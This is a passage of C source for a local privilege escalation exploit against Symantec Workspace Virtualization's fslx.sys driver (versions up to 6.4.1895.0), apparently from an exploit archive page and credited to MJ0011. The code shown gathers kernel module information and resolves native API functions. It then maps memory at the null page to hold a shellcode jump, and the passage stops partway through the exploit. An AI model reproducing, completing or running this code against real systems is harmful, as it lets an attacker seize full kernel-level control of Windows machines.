Symantec Workspace Virtualization 'fslx.sys'本地权限提升漏(3)

int main(int argc, char* argv[])
{
    printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
        "fslx.sys <= 6.4.1895.0\n"
        "\nBy MJ0011\n2013-7-17\nth_decoder@126.com\nPRESS ENTER\n");
   
   
    getchar();
    PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
    if (pinfo==0)
    {
        printf("cannot get system info\n");
        return 0 ;
    }
    if (!InbvInit(pinfo->Module[0].Base , strrchr(pinfo->Module[0].ImageName , '\\') + 1))
    {
        printf("cannot init inbv system!\n");
        return 0 ;
    }
    pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtQueryValueKey");
   
    //alloc shellcode jump
   
   
    PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
   
   
    PVOID BaseAddress = (PVOID)0x1 ;
    ULONG dwsize = 0x1000 ;
    LONG status ;
    status = NTAllocateVM
        (
        GetCurrentProcess() ,
        &BaseAddress ,
        0 ,
        &dwsize ,
        MEM_COMMIT | MEM_RESERVE ,
        PAGE_READWRITE
);